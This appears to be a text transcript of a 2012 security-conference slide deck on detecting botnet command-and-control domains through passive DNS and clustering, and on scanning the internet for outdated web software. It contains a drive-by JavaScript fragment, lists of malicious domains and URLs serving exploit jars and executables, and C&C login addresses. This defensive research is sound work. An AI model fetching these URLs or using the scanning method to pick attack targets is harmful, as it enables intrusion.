hitbkl 2012
DESCRIPTION
TRANSCRIPT
![Page 1: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/1.jpg)
Messing up with Kids playground:Eradicating easy targets
Yarochkin Fyodor @fygraveVladimir Kropotov @vbkropotov
Presented at HITBKL 2012
![Page 2: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/2.jpg)
agenda
Introduction (cybecrime 2012 – russian style :)Detecting malicious network infrastructureGetting one-step-aheadConclusions
![Page 3: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/3.jpg)
DCCrime-2012: Brief Introduction
● Bots and Botnets – still popular :) ● Monetization schemes vary. ● DbD is one of the most common attack vectors
– We also have email
– We also have stupid users downloading sh*t
– Mobile is lucrative target (all your money are there)
![Page 4: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/4.jpg)
DCCrime-2012: Introduction
“Traffic” - is still an important component in the process :)
![Page 5: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/5.jpg)
Main “components” to deal with
● Callback nodes (aka C&C)● Traffic:
– Compromised machines/or manipulated content
– Banner networks
– SEO (doorways)
![Page 6: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/6.jpg)
What's new this year?
● Automated detection gets difficult. (anti-sandboxing, anti-crawler tricks)
● In some cases of idiocy, human interaction is a must..
● Mobile phone as the most common means of funds transfer
function() { var url = 'http://yyzola.gpbbsdhmjm.shacknet.nu/g/'; … document.onmousemove = function() {
…
![Page 7: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/7.jpg)
Mobile scams
● Fake apps are still big● Android apps avail :)
![Page 8: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/8.jpg)
So really, how easy it is to get pwnedIn Russia? :)
![Page 9: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/9.jpg)
● So the focus of this research: – Identifying “bad kids” playground – mapping
infrastructure, identifying potential targets, attempting to fix the problems, before “things hit hard”
![Page 10: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/10.jpg)
Detecting malicious networkinfrastructure
![Page 11: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/11.jpg)
DNS: (did u see this morning passive DNS talk? ;-))
With a spike of generative domain botnets, this seems like interesting research project
DGAs produce very specific pattern in DNS traffic
![Page 12: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/12.jpg)
Is this the only method to call back?
Nop..
![Page 13: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/13.jpg)
13
Alternatives...
![Page 14: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/14.jpg)
Domain generative bots
● C&C is not hardcoded to maintain flexibility in cases when C&C is taken down.
● Some sort of algorithm is used to generate domain names
● Domains are tested for validity. IP address is obtained.
● Sometimes obfuscation involved. (for example: manipulations applied to resolved IP address)
![Page 15: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/15.jpg)
How it looks on the wire
![Page 16: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/16.jpg)
C&C/generative domains and pattern mining
● Generative-domain name based domains generate very specific voluminous DNS traffic
● Our research is primarily focused on picking up these patterns. Example Carberp (details provided by Vladimir Kropotov)
![Page 17: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/17.jpg)
Carberp
● Bot Infection: Drive-By-HTTP● Payload and intermediate malware domains: normal,
recent registration dates or DynDNS● Distributed via: Many many compromised web-sites, top
score > 100 compromised resources detected during 1 week.
● C&C domains usually generated, but some special cases below ;-).
● C&C and Malware domains located on the same AS (from bot point of view). Easy to detect.
● Typical bot activity: Mass HTTP Post
![Page 18: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/18.jpg)
DomainURLReferrerPayloadSize
beatshine.is-saved.org
/g/18418362672595167.js www.*****press.rujavascript9414
activatedreplacing.is-very-evil.org
/index.php?28d9000e56c2a63080ff89c6f5357591
www.*****press.ruhtml45443
activatedreplacing.is-very-evil.org
//images/r/785cee8be7f1da9a9d60820cbf8b1840.jar
application/x-jar
4135
activatedreplacing.is-very-evil.org
/server_privileges.php?91370f5f009a815950578cb539f28b58=3
application/executable
155529
![Page 19: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/19.jpg)
DomainURLReferrerPayloadSize
3645455029/1/s.htmlInfected sitehtml997
Java.com/js/deployJava.js 3645455029javascript4923
3645455029/1/exp.jarapplication/x-jar
18046
3645455029/file1.datapplication/executable
138352
![Page 20: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/20.jpg)
Detection: related works
From Throw-Away Traffic to Bots: Detecting Rise of DGA-Based Malware (Manos Antonakakis, Roberto Redisci et al) (2012)
L. Bilge, E. Kirda, C. Kruegel, and M. Balduzzi.
EXPOSURE: Finding malicious domains using
passive dns analysis. In Proceedings of NDSS,
2011
etc..
![Page 21: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/21.jpg)
What we do differently:
● “lazy” WHOIS lookups, team cymru IP to ASN lookups
● Our own passive DNS index● Sandbox farm (mainly to detect compromised
websites automagically and study behavior)
![Page 22: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/22.jpg)
Dealing with false positives: filtering● Generated sequences: n-gram analysis
● WHOIS cross-ref (if available)● Ips belong to Malicious ASN● Public domain lists (alexa top 100k) works well
as whitelist
![Page 23: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/23.jpg)
Cat and mouse game
● Of course all of this is easy to evade. Once you know the method. But security is always about 'cat-n-mouse' game ;-)
![Page 24: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/24.jpg)
Architecture
● What we are building ;)
![Page 25: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/25.jpg)
Are we using signatures?
Yes and No..● We don't have signatures for C&C domains..● But we maintain patterns for suspicious whois
data (registration date, registrar, email, ..)● Historical DNS and AS association (bad IP)● Generic patterns for generative domains (high,
similarly distributed pattern of failed lookups within the same zone)
![Page 26: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/26.jpg)
A walk through automated detection
● In this example we will show how automated detection works step by step. We will show redis queries in form of interactive session:
![Page 27: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/27.jpg)
Detection starting point: rcode: 3 (Non-existing domains)
Row 1 Row 2 Row 3 Row 40
2
4
6
8
10
12
Column 1
Column 2
Column 3
![Page 28: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/28.jpg)
Detection: rcode:2 (server failure)Rcode:2 domains(failed servers)
![Page 29: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/29.jpg)
Sample analysis (step by step)
● Start looking for a failed pattern and cluster id:
![Page 30: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/30.jpg)
Sample analysis (two)
● Get the cluster ID: (eu_11_14)
Clustering is based on domain similarity. Currently used characteristics: - f(zone, pattern (length, depth)) - additional characteristics (building up): natural language domain vs. generated string (occurrence of two-character sequences - n-grams)- domain registration parameters (obtained via WHOIS [ problematic! ] )- cross-reference with existing malicious IP and AS reputation database (incrementally built by us)
![Page 31: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/31.jpg)
Sample analysis
● Get other members of the cluster
![Page 32: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/32.jpg)
Sample analysis
● Find common members (notice avatarmaker.eu could be a false positive, easily filtered out through common denominator filering (IP, WHOIS information)
![Page 33: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/33.jpg)
Sample analysis
● So we have C&C IP 66.175.210.173● we can continue mining to see if we get any
other domain names:
![Page 34: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/34.jpg)
Sample analysis
● Look! We just met an old friend!!
![Page 35: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/35.jpg)
Sample analysis
● Palevo:
![Page 36: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/36.jpg)
Mapping C&C (easily automated)
● http://cihunemyror.eu/login.php● http://foxivusozuc.eu/login.php● http://ryqecolijet.eu/login.php● http://xuqohyxeqak.eu/login.php● http://foqaqehacew.eu/login.php● http://jecijyjudew.eu/login.php● http://voworemoziv.eu/login.php● http://mamixikusah.eu/login.php● http://qebahilojam.eu/login.php● http://foqaqehacew.eu/search.php● http://foqaqehacew.eu/search.php● http://foqaqehacew.eu/LMvg9Ng1d.php
![Page 37: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/37.jpg)
Sample analysis
● Finding more relevant domains:
![Page 38: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/38.jpg)
Automation
![Page 39: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/39.jpg)
Zoom in...
![Page 40: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/40.jpg)
Performance
● On single machine (32Gb RAM) we run up to 2000 pkt/sec without significant performance loss
● Average load:
![Page 41: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/41.jpg)
Other Interesting numbers
● Packets per day: ~130M filtered.● Mal. Domains/day: ~30k DNS queries (varies)● Avg. 30-50 req/minute for single domain●
![Page 42: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/42.jpg)
Uses of the data
● Obvious: blacklists● Botnet take overs (costs 11USD or less ;)● Sinkholing
![Page 43: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/43.jpg)
Detection
● (demos, lets look at some videos :)
![Page 44: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/44.jpg)
What could be more flux than fastflux? ;-)
● WHOIS fastflux … HOW?!
Domain ID:D166393631-LRORDomain Name:FOOTBALL-SECURITY-WETRLSGPIEO.ORGCreated On:21-Aug-2012 01:23:52 UTCLast Updated On:21-Aug-2012 01:23:53 UTCExpiration Date:21-Aug-2013 01:23:52 UTCSponsoring Registrar:Click Registrar, Inc. d/b/apublicdomainregistry.com (R1935-LROR)Status:CLIENT TRANSFER PROHIBITEDStatus:TRANSFER PROHIBITEDStatus:ADDPERIODRegistrant ID:PP-SP-001Registrant Name:Domain AdminRegistrant Organization:PrivacyProtect.orgRegistrant Street1:ID#10760, PO Box 16Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.orgRegistrant Street3:Registrant City:Nobby BeachRegistrant State/Province:Registrant Postal Code:QLD 4218Registrant Country:AURegistrant Phone:+45.36946676
![Page 45: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/45.jpg)
Moving ahead:Finding easy targets before they do :)
![Page 46: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/46.jpg)
In short, it is all about quick ways of finding idiots having no clue of what they are doing with
wordpress, oscommerce, openx, [put yer fave]And forcing them to update before they get owned
;)And hmm.. doing it country-wide
![Page 47: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/47.jpg)
disclaimer
Just another “small data” project we play with.Around 4 machines solr cluster.
Largely inspired by “Fruit: why so low?” by Adam MetlStorm (hack.lu 2011)
![Page 48: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/48.jpg)
Scanning internet is not new..but pretty much realistic
![Page 49: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/49.jpg)
Architecture
● Network port discovery (agents)● Banner collection (agents)● Backend Store: SOLR● Collectibles: services and ports, OS fingerprints, ● ASN/OWNER/netblock/Country, geographical
location/App data
![Page 50: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/50.jpg)
Architecture(2)
● Roughly something like that
![Page 51: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/51.jpg)
Approach
● Scan slow (avoid abuse reports)● Index time● Passive “mapper” (simple sniffer + browser
fingerprinting at the moment)● Larger range of ports (account port numbers, which
are actively being scanned from firewall log analysis, honeypot machines etc)
● For web apps – (wafp fingerprinting) + index banner (noisy, cause of most of the abuse complaints)
![Page 52: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/52.jpg)
How you use this shit...
![Page 53: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/53.jpg)
Features
● Scriptable via restful API (think of solr) (cuz UI is for sissies ;-))
● Query by any combination of:– software version/banner regex (solr/lucene style)
– geospatial search (via geohash)
– ASN or regex on ASN owner
– Country code
![Page 54: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/54.jpg)
Uses
CERT team: automated notifications of idiots running old wordpress within particular range, geographic location or organization is a one liner script
![Page 55: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/55.jpg)
Questions
@fygrave@vbkropotov